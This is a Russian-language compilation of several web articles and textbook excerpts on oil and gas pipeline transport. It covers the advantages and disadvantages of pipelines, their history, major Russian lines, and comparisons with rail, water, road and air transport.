Трубопроводный транспорт нефтепродуктов: плюсы, виды трубы

На сегодняшний день транспортировка газо- и нефтепродуктов оказывает большое влияние на развитие России и других стран. Для осуществления данной цели может использовать практически любой транспорт, однако наиболее широкое распространение получил именно трубопроводный.

Чтобы понять, почему именно трубопровод используется для доставки газа и нефти практически по всему миру, нужно ознакомиться с его особенностями, преимуществами и недостатками.

Общая информация

Для начала стоит отметить, что все трубопроводы подразделяются на три группы:

  1. Подземные газопроводы.
  2. Нефте- и продуктопроводы.
  3. Трубопроводы перекачивающих предприятий.

Особенность данного вида транспортировки сырья заключается в высоком давлении, при котором осуществляется весь процесс.

Таким образом, трубы работающие с нефтью, как правило, испытывают давление в 4,0-6,4 МПа, а устройства, транспортирующие газ – до 7,0 МПа.

В связи с повышением давления на трубы в последнее время начали изготавливаться преимущественно трубопроводы, которые могут выдержать нагрузку до 10 и более МПа.

Из-за того, что обычно трубопроводы имеют огромную длину (несколько десятков тысяч километров), для их диагностики устанавливают ряд сооружений, располагающихся непосредственно вблизи устройства. Такими средствами диагностики являются:

  1. Линейные сооружения (лупинги, линии связи, станции защиты от коррозии и др).
  2. Насосные станции – сооружаются на каждых 400-600 км. трубопровода.

Преимущества трубопроводного транспорта

К преимуществам использования газопровода и нефтепровода относят следующие параметры:

  • Низкая себестоимость транспортировки (если сравнивать с другими видами транспорта).
  • Минимальные вложения в транспортировку груза из одной точки в другую, а также быстрая окупаемость устройства при его строительстве.
  • Возможность создания кратчайшего пути при доставке сырья – трубопровод можно проложить в любом направлении и на любое расстояние.
  • Короткие сроки возведения.
  • Бесперебойная и своевременная доставка продуктов к местам сбыта, не зависящая от климатических условий (погоды, температуры, осадков и др).
  • Практически весь процесс транспортировки автоматизирован.
  • Во время перекачки потери газо- и нефтепродуктов практически равны нулю.
  • Возможность транспортировки сразу нескольких видов газо- или нефтепродуктов по одному трубопроводу.
  • Возможность увеличения пропускной способности устройства, за счёт возведения перекачивающих станций и проведения второстепенных трубопроводов (лупингов).
  • Интенсивная работа в течение всего года (возможны кратковременные остановки во время аварий или диагностик).
  • Возможность комплексного наблюдения за всеми элементами трубопровода и устройством в целом.
  • Снижение нагрузки на традиционные виды транспорта.
  • Простота в эксплуатации и надёжность.

Все вышеперечисленные преимущества сделали трубопровод одним из самых развитых и распространённых способов транспортировки сырья во всём мире. Также на повышение спроса повлияло открытие новых месторождений газа и нефти, которые располагались на большом расстоянии от точек их переработки и сбыта.

Недостатки

Несмотря на большое количество преимуществ, трубопроводный транспорт также обладает следующими недостатками:

  • Строительство устройства требует крупных капитальных вложений. Это делает целесообразным проведение трубопровода только при стабильных и регулярных поставках нефте- и газопродуктов.
  • Заполнение трубы газам, нефтью или другим сырьём также требует немалых материальных затрат. Особенно это ощущается в магистральных устройствах, где большие затраты связаны с высокой металлоёмкостью, низкой скоростью движения сырья (обычно не выше 10 км/ч) и другими факторами.
  • “Жёсткость” трассы устройства, вследствие чего для снабжения новых точек сбыта продукта требуется дополнительные капитальные вложения.
  • Узкая специализация – данный способ транспортировки специализируется преимущественно на доставке нефти и газа.
  • Возможность нанесения ущерба окружающей среде, особенно если речь идёт о подводном трубопроводе, выбросы из которого негативно влияют на состояние воды и её обитателей.
  • Сложность (а в некоторых случаях и её отсутствие) прокладки трассы в регионах со сложным рельефом.

На сегодняшний день главная проблема данного вида транспорта заключается в том, что запросы потребителей нефти постоянно растут, а увеличить размер поставляемого груза не так-то просто. Сделать это можно путём увеличения давления в трубах или путём их замены на новые, с более крупным диаметром.

В России диаметр таких труб, в большинстве случаев, составляет 1020 мм, в то время как в некоторых других странах эти размеры превышают 2000 мм. При замене труб на более широкие появляется новая проблема – необходимость новых затрат для раскапывания и замены труб (плюс к этому стоимость самого устройства).

По этой причине государство пока не решается на данный шаг.

Увеличение давления также является рискованным решением, так как труба может не выдержать и прорваться, что приведёт к большой потере сырья, затратам на ремонт, а также к приостановке доставки сырья в место сбыта или обработки (что также потребует дополнительных затрат).

Для чего используется?

В 90% случаев трубопроводный транспорт используется для реализации:

  1. Газа.
  2. Нефти.
  3. Аммиака.
  4. Этанола.

Транспортировка аммиака и этанола, в отличие от газа и нефти, обладает рядом особенностей. Например, аммиакотрубопровод требует труб с дополнительными стенками, между которых заливается азот. Толщина стенок при этом может достигать 15 мм.

Этанол транспортируется по трубам лишь в Бразилии и США. Всё дело в том, что данное вещество оказывает негативное влияние на состояние труб (вызывает коррозию, поглощает воду из стенок сооружения). К тому же такой трубопровод пользуется малым спросом и его проведение попросту будет неокупаемым.

Источник: https://plusiminusi.ru/truboprovodnyj-transport-osnovnye-plyusy-i-minusy/

Трубопроводный транспорт

В последние десятки лет трубопроводный транспорт стал играть немалую роль в развитии российской экономики.

На это повлияло несколько факторов: увеличение объемов добычи нефти, рост налоговых поступлений, появление новых рабочих мест, повышение экономического развития регионов и т.д.

Государство эффективно использует системы трубопроводного транспорта в регулировании поставок нефтепродуктов как внутри страны, так и за ее пределы.

Общая информация

Топливно-энергетическая система лежит в основе многих экономических отраслей России. Одной из самых главных ее составляющей считаются магистральный трубопроводный транспорт, при помощи которых происходит доставка нефти, газов и продуктов их переработки на большие расстояния.

Также, в ее состав входят предприятия по сбору, накоплению и разделению данных продуктов среди потребителей.

Нефтяные и газовые российские месторождения занимают немалое место на территории страны, что превращает трубопроводный транспорт в мирового лидера среди других видов доставки нефте-газовой продукции.

В последние годы происходит разработка и строительство нескольких крупных трубопроводных транспортных систем. Ведущие позиции среди них занимает магистральный трубопровод «Восточная Сибирь – Тихий океан».

Его длина составляет больше 4,4 тысяч километров, а пропускная возможность 80 миллионов тонн в год. Данный проект предназначен не только для освоения и развития Восточно-Сибирских месторождений.

Его задачей является и развитие новейших больших сибирских и дальне-восточных промышленных центров.

Не меньшее международное значение имеют и другие разработки трубопроводных транспортных систем (нефтепровод «Бургас – Александропулис», «китайский» газопровод, газопровод «Южный поток» и немало других).

Трубопроводным транспортом называют такой тип транспорта, который осуществляет по трубопроводам передачу твердых, жидких и газообразных продуктов на определенные расстояния. В основном, он предназначен для доставки нефти и газа. Данный тип транспорта подразделяется на 2 категории: промышленный и магистральный. Последний включает в себя нефте- и газопроводы, предназначенные для перемещения продуктов с территории добычи до мест переработки и потребления (на предприятия или порты у моря для загрузки в танкеры и дальнейшей транспортировки). По трубопроводам данного типа происходит доставка нефтепродуктов с предприятий в регионы потребления. Трубопроводный транспорт применяют для перемещения продукции, которая поддается движению по трубам, в зоне одного предприятия по различному производству. С его помощью технологический процесс происходит без остановки.

Трубопроводный транспорт включает в себя нефтебазовые, газоразводящие, канализационные и водопроводные системы внутри города, внутридобывающие газо-, нефте-, продуктопроводы и т.д.

Трубопроводный транспорт имеет множество преимуществ. Он финансово выгоден и универсален. Кроме того, его использование практически исключает потерю продукции в процессе доставки.

Все этапы работ, присущие данному виду транспорта, полностью механизированы и автоматизированы.

Все это приводит к уменьшению себестоимости транспортировки (к примеру, доставка жидких грузов по трубопроводам в 3 раза выгоднее, чем их транспортировка по железной дороге).

Для увеличения отдачи от использования трубопроводного транспорта необходимо увеличить размеры труб, повысить давление продуктов в трубах, применять более совершенные компрессорные механизмы. Для того, чтобы стоимость доставки газа стала еще ниже, планируется осуществлять его перемещение в охлажденном состоянии.

Совершенствование российского трубопроводного нефтяного транспорта

Как известно, трубопроводный транспорт является финансово выгодным по сравнению с остальными способами доставки нефти. Формирование магистральных нефтепроводов на территории, принадлежащей бывшему Советскому Союзу, происходило по особым принципам расположения мест нефтедобычи и ее переработки. Идея применения первого трубопровода для перекачивания нефти и продуктов ее переработки принадлежит русскому ученому Д.И.Менделееву. Именно он в 1863 году убедил общественность в преимуществах данного вида транспорта и объяснил, каким именно образом он должен быть построен. Первым советским транспортом подобного вида считается трубопровод, возведенный на Апшеронском полуострове для доставки нефти с Балаханского месторождения в бакинские нефтеперерабатывающие предприятия. Его протяженность составляла всего 12 км, а диаметр его труб равнялся 75 мм. Проект принадлежит именитому русскому инженеру В.Г.Шухову. К началу 21 века общая длина трубопроводов из бакинского региона составляет 230 км. Каждый год по ним доставляется около миллиона тонн продукции.

К 1917 году было возведено несколько трубопроводов, общая длина которых была равна 1300 км, а средняя величина трубы – 197 мм. Тем не менее, в те годы трубопроводы были не способны конкурировать с развитым железнодорожным транспортом. К примеру, в 1913 году трубопровод «Баку-Батуми» перекачивал всего 6% от всего объема перегоняемой нефти.

Ускоренное развитие российского трубопроводного транспорта началось после освоения татарских, башкирских и самарских месторождений. Первый, проложенный под землей нефтепровод «Уфа-Ишамбай» появился в 1936 году. Его длина составляла 168 км, а диаметр труб 300 мм.

Он предназначался для перекачки нефтяной продукции из скважин «второго Баку», проложенных на Уфимском НПЗ.

После разработки западно-сибирских месторождений строительство магистральных трубопроводов получило новый виток.

Добыча нефти в этих районах все больше разделило региональное размещение добычи нефти и ее переработки, которое переместилось в центральную часть России, в Среднюю Азию и в южные районы Сибири. Данный факт стал поводом для переброски крупных нефтяных потоков в эту местность.

Стали строиться трубопроводы, имеющие большую длину и большие диаметры, причем, сроки возведения насосных станций и трубопроводов уменьшились в несколько раз.

Большое значение данный вид транспорта получил во время освоения месторождений в тюменской области. После увеличения нефтедобычи в западно-сибирском регионе в главное транспортное направление превратилась центральная часть России. В 1970-е годы произошел скачок развития возведения нефтепроводов. Транзитные магистральные нефтепроводы, имеющие огромную протяженность, обладают диаметрами труб в 1000 и 1200 мм. Тогда же было проложено 3,5 тысячи км новейших трубопроводов под землей, диаметр которых составлял 720 и 1220 мм. Их количество составляло 70% от общей массы магистральных трубопроводов. Подземные трубопроводы передавали до 85% продукции от всего грузооборота.

Магистральный трубопроводный транспорт сегодня

Как известно, создание сегодняшней системы магистрального трубопроводного транспорта происходило на протяжении нескольких десятилетий. В их схему были соединены технические средства не одного поколения.

Именно поэтому, в настоящий момент все еще используется оборудование, которое было изготовлено в разное время разными предприятиями и имеющее различную техническую документацию.

Не удивительно, что устаревшее оборудование, имеющее разные типы, но одно функциональное назначение, делает систему менее надежной и требует на ее ремонт и техобслуживание немало трудовых и финансовых затрат.

Качество производимых в России труб оставляет желать лучшего по сравнению с зарубежными аналогами. Всего лишь четвертая их часть подходит под международные стандарты. Главным минусом является недостаточное количество труб большого диаметра, весьма востребованных сегодня на российском рынке.

Будущее российского трубопроводного транспорта

Если брать во внимание особое значение трубопроводного транспорта для экономики России, то транспортные ограничения могут превратиться в одно из серьезных препятствий при воплощении в жизнь долгосрочных целей промышленной политики государства.

В связи с отсутствием развитой трубопроводной инфраструктуры в восточных российских регионах разработка перспективных месторождений нефти в восточно-сибирских и дальневосточных районах, играющих огромную роль в развитии вывоза нефти в государства АТР, происходит слишком медленными темпами.

Таким образом создание и развитие трубопроводной промышленности в России является наиболее актуальным направлением.

Источник: https://dispetcher-gruzoperevozok.biz/rossijskij-truboprovodnyj-transport/

Трубопроводный транспорт: особенности, сферы деятельности, проблемы

Трубопроводный транспорт — это специфический вид транс­порта, осуществляющий перекачку грузов по трубам. Трубопровод­ный транспорт отличается от остальных видов транспорта тем, что понятие подвижной состав и специально приспособленные под него пути сообщения совмещены в единое целое — трубопровод.

Россия занимает второе место в мире после США по протяжен­ности трубопроводов. Протяженность магистральных газопроводов составляет 161,7 тыс. км, нефтепроводов — 70 тыс. км. На трубопро­водном транспорте перевозится 90 % добываемой нефти (по желез­ной дороге 6 %, на автомобильном транспорте 4 %).

Трубопроводный транспорт представляет собой трубопровод из сварных, как правило, стальных труб различного диаметра (для Рос­сии характерны 1 067; 1 220 и 1 420 мм) и насосных станций, рас­положенных на трубопроводе через каждые 100… 140 км, которые работают в автоматическом режиме.

При перекачке газа на трубопроводах устанавливают через каж­дые 200 км компрессорные станции для сжатия (сжижения) газа, что повышает производительность перекачки. Трубы многослойные, с антикоррозионным покрытием внутри, для снижения сопротивления внутри труб обрабатывают эпоксидной смолой или пластиком. В по­следние годы делают трубы из пластмасс.

К устройствам трубопроводного транспорта относят также линей­ные узлы для соединения и разъединения параллельных или пере­секающихся магистралей и перекрытия отдельных участков, в том числе при ремонте или авариях.

В комплекс технического оснаще­ния входят также средства связи для передачи информации, напри­мер, телесистемы дистанционного наблюдения, обеспечивающей функционирование всей системы, сооружения для изменения физи­ческого состояния нефти или газа, для поддержания определенного уровня температуры, очистки газа, одоризации, т.е. приданию газа для бытовых нужд специального запаха и т.д.

Ввиду того что основные месторождения нефти и газа в России находятся в районах Севера и Сибири, роль трубопроводного транс­порта для доставки этих грузов неоценима: по трубопроводам транс­портируется более 95 % сырой нефти, весь природный газ, 50 % про­дукции нефтепереработки.

Трубопроводный транспорт играет большую роль во внешней тор­говле России, снабжая не только экономику нашей страны нефтью и газом, но и экономику стран Западной Европы, Турции и стран Юго-Восточной Азии.

Доля трубопроводного транспорта в общем объеме перевозок по­стоянно растет (табл. 2.1).

Таблица 2.1. Рост объема перевозок трубопроводным транспортом России

Показатель Годы
Объем перевозки, млн т 777,7 1 050
Грузооборот, млрд т • км 1 873,2 2 123 2 395
  • Магистральными (более 1 ООО км длиной) трубопроводами Рос­сии являются:
  • • крупнейший нефтепровод мира «Дружба» мощностью 66,5 млн т в год и длиной 5 116 км от Альметьевска до стран Восточной и За­падной Европы (3 445 км на территории нашей страны);
  • • трансконтинентальный газопровод Уренгой —Помары — Ужгород (построен в 1983 г.) мощностью 32 млрд кубометров газа в год и длиной 4 450 км для снабжения Европы;
  • • нефтепровод «Транссибирский» Туймазы — Иркутск длиной 3 700 км;
  • • «Союз» от Оренбурга до западной границы страны протяжен­ностью 2 750 км;
  • • Ямбург — западная граница длиной 4 605 км для продажи в ФРГ, Францию, Австрию, Швейцарию и другие страны;
  • • нефтепровод Мангышлак —Поволжье —Украина длиной 2 500 км;
  • • Каспийский трубопроводный консорциум мощностью 28,2 млн т.

В 2012 г. пущена Балтийская система длиной 1 300 км, которая связала трубопровод Дружба с морскими портами России на Балтий­ском море. Россия активно строит новые трубопроводные системы для продажи нефти и газа.

Основные технико-эксплуатационные особенности и досто­инства трубопроводного транспорта:

• эффективность работы на любых расстояниях перевозки;

• трубопровод может быть проложен на земле и болотистых участ­ках, под землей и участках вечной мерзлоты на специальных под­порках и т. п. Газопровод «Голубой поток» Россия — Турция мощно­стью 16 млрд м3 газа в год в 2003 г. проложен по дну Черного моря. Протяженность 1 213 км, из них под водой — 396 км. Диаметр под­водных труб 610 мм;

• самая низкая себестоимость и самая высокая производитель­ность труда, что связано с ограниченной численность персонала, не­обходимого для перекачки газа;

  1. • размеры перекачки не ограничены;
  2. • полная сохранность качества и количества грузов благодаря гер­метизации труб и станций;
  3. • отсутствие отрицательного воздействия на окружающую среду;
  4. • автоматизация операций по сливу, наливу (начально-конечные операции)и перекачке;
  5. • незначительная зависимость от климатических условий, что де­лает процесс перекачки непрерывным;
  6. • меньшие капиталовложения, чем в другие виды транспорта;
  7. • более короткий путь по сравнению с водными видами транс­порта, по которым перевозят достаточное количество жидких гру­зов.
Рис. 2.9. Классификация трубопроводного транспорта
  • Относительные недостатки трубопроводного транспорта:
  • • неуниверсальность, так как в основном перевозится ограничен­ная номенклатура грузов, преимущественно жидких и газообразных;
  • • возможность утечки жидкостей или газа (экологическая про­блема).
  • Проблемы и тенденции развития трубопроводного транспорта:
  • • дальнейшее расширение сети трубопроводов, в том числе для снятия перевозки нефти и нефтепродуктов с других видов транспор­та. Грузонапряженность нефтепроводов составляет 7,3 млн т- км/км, а на железной дороге — 16 млн т- км/км;
  • • расширение сети газопроводов как единственно возможного, экологически безопасного и экономически целесообразного способа транспортировки газа;
  • • повышение пропускной способности трубопроводов за счет увеличения диаметра труб, строительства вторых линий, а также при увеличении давления;
  • • увеличение мощности насосных станций;
  • • создание прочных, дешевых и тонкостенных труб;
  • • защита трубы от внутренней и внешней коррозии[18], что связано с агрессивностью среды и блуждающими токами, характерными для городов;
  • • поиск материалов, снижающих или исключающих коррозию;
  • • защита груза от турбулентности, уменьшающей скорость дви­жения и производительность;
  • • укладка труб в местах залегания нефти и газа, особенно в усло­виях вечной мерзлоты;
  • • замена металла для строительства труб;
  • • изменение способа спайки и сварки швов для повышения без­опасности;
  • • быстрый поиск неисправностей в трубопроводе;
  • • расширение номенклатуры перевозимых жидких не нефтяных и твердых грузов.

Классификация подвижного состава трубопроводного транс­порта проказана на рис. 2.9.



Источник: https://infopedia.su/8×7104.html

Достоинства и недостатки трубопроводного вида транспорта газа и нефти

На сегодняшний день основной объем нефти и газа доставляется по трубопроводам, позволяя транспортировать продукты не только качественно, но и быстро.

В настоящее время практически весь добываемый газ и нефть (и продукты их переработки) доставляются по магистральным нефтегазопроводам, имеющим диаметр от 530 до 1220 мм. Для этого применяются трубы сварные большого диаметра, эффективно выдерживающие высокие рабочие давления транспортируемых сред.

Нефтегазопроводы обладают следующими преимуществами:

  • перекачка нефти, газа и нефте-, газопродуктов на значительные расстояния;
  • высокий темп доставки и различная пропускная способность;
  • непрерывная работа круглый год (с кратковременной остановкой, в случае ремонта или аварии);
  • потери на трассе сведены к минимуму, благодаря конструктивным особенностям трубопроводов и их профилактическому обслуживанию;
  • можно транспортировать нефть и нефтепродукты, вязкость которых существенно варьируется;
  • эффективное функционирование в различных климатических зонах, в том числе в районах Крайнего Севера и Сибири (для этого подбираются трубы с соответствующими характеристиками);
  • высокая степень механизации и автоматизации строительно-монтажных мероприятий при создании трубопроводов;
  • комплексное наблюдение и управление за всеми процессами.

Все эти достоинства вызвали всемирное развитие данного способа транспорта. Также этому способствовала разработка новых нефтегазовых месторождений, которые часто находились на значительном расстоянии от районов переработки и потребления данных продуктов топлива.

С совершенствованием технологий возрос не только объем перекачиваемых нефти и газа, но и протяженность, и мощность нефтепроводов.

Соответственно, возросли требования к качеству и надежности применяемых труб.

Поэтому в большинстве трубопроводов высокого давления используются трубы сварные большого диаметра, полностью удовлетворяющие всем требованиям (за счет качественных характеристик изделий).

Трубопроводный транспорт имеет определенные недостатки:

  • высокая стоимость начальных капиталовложений при строительстве нефтегазопроводной сети;
  • опасность нанесения ущерба экологии (особенно при транспортировании подводных трубопроводов);
  • сложность прокладки трассы в определенных районах.

Все отмеченные преимущества трубопроводной доставки нефти, газа и продуктов переработки сложно недооценить. Существующие недостатки использования трубопроводов устраняются путем повышения качества, как труб и других элементов трубопроводов, так и комплексом мер по их профилактике и обслуживанию.

Источник: http://xn--80auckdfcgdadih8kpa.xn--p1ai/welded_pipes/info/advantages_disadvantages_pipeline_mode_transport_gas_oil/

Виды транспорта нефти и нефтепродуктов

Мировая практика транспортировки нефти и нефтепродуктов включает железнодорожный, водный, автомобильный и трубопроводный виды транспорта.

Железнодорожный транспорт — наиболее распространенный вид транспорта для перевозки грузов. Перевозка жидких нефтяных грузов осуществляется в специальных стальных вагонах-цистернах грузоподъемностью 50, 60 и 120 т, выполненных из листовой стали толщиной 8 — 11 мм.

Налив нефтепродуктов в цистерну, как правило, производится сверху, а слив снизу.

Цистерны оборудуются смотровыми площадками, внутренними и наружными лестницами, нижними сливными приборами и другими необходимыми устройствами для надежной эксплуатации в пути следования и при сливно-наливных работах.

В качестве тары для нефтегрузов применяются металлические, пластмассовые и деревянные бочки и бидоны, фанерные и металлофанерные ящики и барабаны, стеклянные бутылки, хлопчатобумажные и бумажные мешки и др.

Водный транспорт нефти делится на речной — по внутренним водным путям (рекам, озерам) и морской — по морям и океанам (как по внутренним морям континента, так и между континентами).

По рекам и озерам нефть перевозится в баржах (в том числе самоходных) и в речных танкерах — специальных самоходных судах, предназначенных для перевозки нефтегрузов.

Морской транспорт нефтегрузов осуществляется морскими танкерами — судами большой грузоподъемности, способными пересекать океаны и моря. Чем больше грузоподъемность танкера, тем дешевле перевозка.

Грузоподъемность современных морских супертанкеров достигает миллиона тонн. Эффективность использования супертанкеров повышается с увеличением дальности перевозок, на малых расстояниях они перестают быть рентабельными.

Сооружаются балктанкеры — комбинированные суда, предназначенные для перевозки нефтей и нефтепродуктов, навалочных грузов и руды.

Имеются танкеры класса «река — море» грузоподъемностью 5000 т повышенной прочности. Эти суда даже способны совершать рейсы в открытых морях — таких, как Средиземное, Охотское.

  • Нефтеналивные суда характеризуются следующими основными показателями:
  • водоизмещением — массой воды, вытесняемой груженым судном. Водоизмещение судна при полной осадке равно собственной массе судна и массе полного груза в нем, включая все необходимые для плавания запасы;
  • дедвейтом —          массой поднимаемого груза (транспортного и хозяйственного);
  • грузоподъемностью — массой транспортного груза;
  • осадкой при полной загрузке;
  • скоростью при полной загрузке.

Автомобильный транспорт — основной вид транспорта для доставки нефтепродуктов с распределительных нефтебаз и наливных пунктов непосредственно к местам потребления (на АЗС, заводы, фабрики, автобазы и т.д.). Для перевозки нефти автотранспорт практически не используют.

Перевозки нефтепродуктов автомобильным транспортом осуществляют, в основном, в пределах нескольких десятков километров.

При больших расстояниях автотранспорт неэкономичен по сравнению с железнодорожным, и его применяют лишь там, где отсутствует сеть других видов транспорта (например, на Севере и т. д. ).

Массовые нефтепродукты (бензин, дизельное топливо, мазут, некоторые масла) перевозят в специализированных автомобильных цистернах и автоприцепах, мелкие партии нефтепродуктов — в таре на бортовых машинах.

Воздушный транспорт нефтепродуктов из-за значительной стоимости применяют лишь для снабжения отдельных пунктов на Крайнем Севере, дрейфующих станций и зимовок в Арктике. Доставку нефтепродуктов воздушным транспортом осуществляют, как правило, в бочках.

Трубопроводный транспорт нефтегрузов осуществляется по специальным трубопроводам от мест производства к местам потребления. По перекачиваемому продукту трубопроводы подразделяют на нефтепроводы, перекачивающие нефть, и нефтепродуктопроводы, перекачивающие бензины, дизельные топлива, керосины, мазуты.

Достоинства и недостатки видов транспорта нефти и нефтепродуктов.

Вид транспорта Достоинства Недостатки
Железнодорожный
  1. — универсальность (перевозка всех видов нефти и нефтепродуктов в любых объемах);
  2. — равномерность доставки грузов в течение всего года с более высокой скоростью, чем водным транспортом;
  3. — доставка нефтепродуктов в большинство пунктов потребления в связи с наличием разветвленных железнодорожных сетей в густонаселенных промышленных и сельскохозяйственных районах.
  • — большие капитальные затраты при строительстве новых, ремонте и реконструкции существующих линий;
  • — относительно высокие эксплуатационные затраты;
  • относительно низкая эффективность использования мощности подвижного состава (цистерны в обратном направлении идут незагруженными);
  • — значительные потери нефти и нефтепродуктов при транспорте и разгрузочно-погрузочных операциях;
  • — необходимость специальных сливно-наливных пунктов и пунктов зачистки вагонов-цистерн.
Водный — неограниченная пропускная способность водных путей; — в большинстве случаев нет необходимости в создании дорогостоящих линейных сооружений. — провозная способность флота ограничивается грузоподъемностью и другими показателями передвижных средств флота, производительностью причального и берегового нефтебазового хозяйства.
Автомобильный
  1. — доставка небольших партий нефтепродуктов на различные расстояния с большой скоростью;
  2. — большая маневренность и высокая проходимость;
  3. — высокая оперативность.
  • — высокие затраты на эксплуатацию, в 10-20 раз стоимость перевозок автотранспортом выше, чем по железной дороге;
  • — сравнительно небольшая грузоподъемность автоцистерн, неполная загрузка подвижных средств из-за порожних пробегов цистерн;
  • — зависимость от наличия и технического состояния дорог.
Воздушный
  1. — доставка небольших партий нефтепродуктов на различные расстояния с большой скоростью;
  2. — отсутствует необходимость в дорогах;
  3. — высокая оперативность.
  • — высокие затраты на эксплуатацию;
  • — сравнительно небольшая грузоподъемность;
  • — зависимость от погодных условий.
Трубопроводный
  1. — наиболее низкая себестоимость перекачки;
  2. — небольшие удельные капитальные вложения на единицу транспортируемого груза и быстрая окупаемость затрат при строительстве трубопроводов;
  3. — бесперебойная поставка в течение года, практически не зависящая от климатических условий;
  4. — высокая производительность труда;
  5. — незначительные потери нефтей и нефтепродуктов при перекачке;
  6. — сравнительно короткие сроки строительства;
  7. — возможность перекачки нескольких сортов нефти и нефтепродуктов по одному трубопроводу;
  8. — возможность наращивания пропускной способности трубопровода за счет строительства дополнительных насосных станций и прокладки параллельных участков (лупингов).
— крупные единовременные капитальные вложения в строительство (необходимо проложить весь трубопровод); — потребность в крупных материальных затратах на заполнение всего трубопровода нефтью или нефтепродуктом при вводе в эксплуатацию. Особенно велики эти затраты для магистральных нефтепродуктоводов: большая металлоемкость, необходимость устойчивого грузопотока на длительное время, небольшая скорость движения нефти и нефтепродуктов (5-10 км/ч).

К магистральным нефтепроводам относятся трубопроводы диаметром от 529 до 1220 мм и протяженностью не менее 50 км, предназначенные для доставки нефти из районов добычи на нефтеперерабатывающие заводы или пункты налива нефти в железнодорожные вагоны-цистерны или в места погрузки ее на танкеры. Производительность магистральных нефтепроводов составляет от 0.7 до 80 млн. т нефти в сутки.

К магистральным нефтепродуктопроводам относятся трубопроводы диаметром не менее 219 мм и протяженностью не менее 50 км, предназначенные для транспортировки нефтепродуктов из районов их производства, а также перевалочных нефтебаз в районы потребления — до распределительных нефтебаз, наливных станций, портов, крупных промышленных предприятий, ТЭЦ и др.

Источник: https://students-library.com/library/read/49221-vidy-transporta-nefti-i-nefteproduktov

Особенности трубопроводного транспорта

К трубопроводному транспорту обычно относят газопроводы и нефтепродуктопроводы. Прообразы трубопроводов – водоводы по бамбуковым трубам – известны с древнейших времен.

Пер­вые нефтепроводы были построены в середине XIX в. в Америке. В России первые нефтепроводы были сооружены в районе Баку и Северного Кавказа в 1870–90-х годах по проекту русского ин­женера В. Г. Шухова.

Их диаметр составлял 100–200 мм, а про­тяженность свыше 1 тыс. км.

Строительство газопроводов начато в основном в 1920–30-е годы. В нашей стране широкая промышленная добыча и пере­качка природного газа началась после Великой Отечественной войны. Газопровод является практически единственным видом магистрального и местного транспорта этого специфического ви­да груза.

Широкое строительство и использование трубопроводного транспорта в последние 50 лет обусловлено значительными изме­нениями в топливно-энергетическом балансе страны, повыше­нием в нем доли нефти и газа до 70–75%. Особенно высокими темпами идет рост добычи и потребления природного газа.

Ввиду того, что основные месторождения нефти и газа в Рос­сии находятся в весьма отдаленных от потребителей районах Се­вера и Сибири, значение трубопроводного транспорта очень ве­лико.

Техническое оснащение: трубопроводный транспорт представляет собой трубопровод из сварных, как правило, стальных труб различного диаметра с антикоррозийным покрытием. Через каждые 100–140 км устанавливаются насосные станции с автоматическим режимом работы. Груз в трубопроводе перемещается под давлением.

При перекачке газа на линии устанавливаются компрес­сорные станции на расстоянии до 200 км друг от друга. К уст­ройствам трубопроводного транспорта относят и линейные узлы для соединения и разъединения параллельных или пересе­кающихся магистралей и перекрытия отдельных участков (в ча­стности, для ремонта).

Трубопроводный транспорт делится на нефте- и продуктопроводы магистральные, подводящие, промысловые и газопрово­ды магистральные и местные.

Трубопроводный транспорт эффективен на любых расстояни­ях. Он используется преимущественно для газообразных и жид­ких грузов и для твердых грузов узкой номенклатуры. Трубопроводный транспорт характеризуется самыми высокими темпами развития. Это относится, прежде всего, к развитию газопроводной сети.

Расширение сети трубопроводов вызвано, в том числе, необходимостью снятия перевозки нефти и нефтепродуктов с железнодорожного, речного и автомобильного транспорта. Необходимо расширение сети газопроводов как единственного экологически безопасного и экономически целесообразного способа транспортировки газа.

Характерной особен­ностью работы трубопроводного транспорта является непрерыв­ность транспортного процесса.

  • К основным технико-экономическим особенностям и пре­имуществам трубопроводного транспорта относят:
  • — возможность повсеместной прокладки трубопроводов;
  • — массовость размеров перекачки;
  • — самую низкую себестоимость транспортировки (если принять среднюю себестоимость перевозок на транспорте за 100 %, то на трубопроводном транспорте она составит 30 %, на железнодорожном – 80 %, на автомобильном – 1600 %);
  • — полную герметизацию, что дает абсолютную сохранность качества и ко­личества грузов;
  • — полную автоматизацию операций по наливу, сливу и перекачке;
  • — меньшие капитальные первоначальные вло­жения;
  • — независимость от климатических условий, а также отсут­ствие отрицательного воздействия на окружающую среду при со­ответствующей изоляции;
  • — самая низкая себестоимость и самая высокая производительность труда, что связано не в последнюю очередь с небольшим количеством людей, необходимых для выполнения перекачки;
  • — большая эффективность работы на любых расстояниях перевозки, по сравнению с другими видами транспорта.
  • Основные недостатки:
  • — узкая специализация по ви­дам грузов;
  • — возможность утечки жидкости или газа (экологическая проблема).

Технология работы трубопроводного транспорта характеризуется непрерывностью перекачки грузов.

Для повышения производительности трубопровода, а иногда и просто для осуществления перекачки (например, особо вязких сортов той же нефти), возникает технологическая необходимость изменения физико-химических свойств грузов, так как температурный режим, или вязкость, либо другие особенности при их добыче могут отрицательно влиять на производительность подвижного состава. Поэтому в отдельных случаях необходимо осуществлять подогрев или понижение температуры, обезвоживание, смешение, дегазацию (разложение отравляющих веществ, выделяемых химическими соединениями, до нетоксичных продуктов) и другие действия.

Рекомендуемые страницы:

Источник: https://poisk-ru.ru/s2087t8.html

Экономика отрасли (транспорт). Трубопровод — курсовая работа

   Давление в магистрали бывает до 100 атмосфер, трубы многослойные, напор, как правило, естественный. Для бытового газа применяют одорезацию (придание специального запаха).

  •    Существуют 
    газохранилища:
  •    — надземные,
  •    — подземные,
  •    — подводные.

2.3 Трубопроводы для транспортировки твердых материалов

Трубопроводы 
для транспортировки твердых 
материалов делятся на:

   Гидросистемы транспортируют твердые смеси с водой, пневмосистемы – твердые смеси с воздухом.

Выводы 
по разделу два

      Широкое применение трубопроводного транспорта привело к возникновению различных 
видов трубопроводов, которые в 
своей совокупности обеспечивают все 
возникающие потребности газовой, нефтяной и других отраслей промышленности. Трубопроводный транспорт обеспечивает непрерывное движение продукта от места 
добычи до конечного потребителя.  

   Значимость 
трубопроводного транспорта для 
Российской Федерации определяется значительной удаленностью основных месторождений 
нефти и газа от потребителей, а 
также высокой долей нефти, нефтепродуктов и газа в экспортном балансе России.

В целом трубопроводный транспорт все больше специализируется на перемещении отдельных видов продукции: жидких (от нефти и нефтепродуктов до молока), газообразных (природный и попутный газы, аммиак, этан, этилен и др.), твердых (уголь, зерно и др.).

